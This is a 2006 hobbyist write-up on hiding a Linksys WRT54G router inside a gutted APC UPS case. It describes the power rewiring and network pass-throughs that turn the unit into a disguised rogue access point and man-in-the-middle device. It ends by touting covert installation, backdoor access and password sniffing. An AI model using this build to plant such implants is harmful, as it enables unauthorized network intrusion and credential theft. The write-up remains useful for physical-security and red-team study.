The Sneaky Bastard


June 2006


What


The Church of Wifi set about building "The Evil Bastard", an implementation of the most evil things you could do with MiTM attack for wireless. It became apparent that just having an evil WRT54G was not enough if you couldn't get it into place to do it's dirty deeds was a problem.

The guys at Inventgeek came up with "Project Silver" which was a small rogue storage server built into a UPS case. The logic being that in an RIAA raid, your mp3's would be safely disguised as a lowly UPS. I remember thinking when I saw it that A) It was impractical as a raid usually nets every technology more complex than a spoon B) The host will show up on the network and any sane investigator will start tracing cables and find it. This did inspire me to look at a UPS as perfect camoflauge.

A UPS typically has a power cord (I hope) that plugs into 110/220 mains and higher end models have a surge suppressor on board for the network cable, and/or a cable for the control console. This is everything we need to camoflauge a rogue access point. Plus, with a bit of work, the UPS could continue to function as a power bar, keeping it's appearance as a normal UPS.

How

The access point in question for this prototype was the every popular and ubiquitous Linksys WRT54G. The UPS was an old APC 350 that got flooded and had an unfortunate arc across the board and was dead. This shell was the perfect size to fit the WRT board, gave me access to AC power and an excuse for 2 network jacks.

First goal was to strip the UPS case. This was as easy as a few screws and a few warranty stickers. I ripped out the battery and control board. I saved the plug hardware and most of the wiring for later.

The battery compartment was a separate housing meant to be user serviceable and accessible while keeping the rest of the guts away from fingers. This had to go to give enough operational space. A dremel made short, smelly work of the battery compartment walls. I also ground down some of the bosses and moulding in the case to maximize the available space and cube out the space.

Next step was to re-connect the power. We needed to give the WRT power off the mains line, as well as to have the power jacks working to disguise the new contents. The previous circuit had the hot side come in from the wall and go into the control board. Normally it was run to the battery, then to the power plugs. I had an old extension cord that I hacked the end off and soldered in line with the hot side along with the UPS power plugs. This gave me power inside the UPS and now bypassed where the control board was, energizing the UPS plugs.

The rest was pretty easy. The WRT fix snugly in and with just enough room for the stock antennas to fit with the AC power brick. I wanted to be able to re-use the WRT back in it's blue case, so I fastened it in place with tie wraps and sticky wrap mounts so as not to permanently damage or modify the board.

The network jacks were fairly easy. Just a short jumper cat5 cable to a RJ45 wall jack. I could have used board mount jacks and made a breakout, but this was the prototype and Defcon was coming up quickly. Both cables were glued to the slot that previously held the network surge suppression pass-through and console jack. I didn't get a chance to paint or make a nice plate to cover the extra space, but I think it looks pretty good. The other ends simply plug into the switch ports on the WRT. This won't suppress a surge, but one plug going to the network, and one to the computer, now makes you a Man-in-the-middle for the cable it's 'protecting' as well as gives you a unix box to access the network from.


Conclusion

All secured back together, and the unit looks indistinguishable for a stock UPS. Effort could have been made to replace the power button and LED's but that's just academic window dressing that most people wouldn't notice if you swapped their UPS at 3am.

When in place, all the power jacks work and can be used as normal. There is no battery backup anymore, so it might get noticed in a rare power failure, but that's unlikely. When plugged in, the WRT fires up and is now a rogue AP inside the network. The addition of the network passthroughs gives you A) Network access for your rogue AP and B) since the workstation is routing through your rogue device, you are the man in the middle.

Your WRT can now provide backdoor access, snarf passwords wired and wireless and dump them to an external source, or if you got really fancy, dump them to a CF card for later retrieval in person or over wireless. The possibilities are endless, and well camoflauged


Return to Main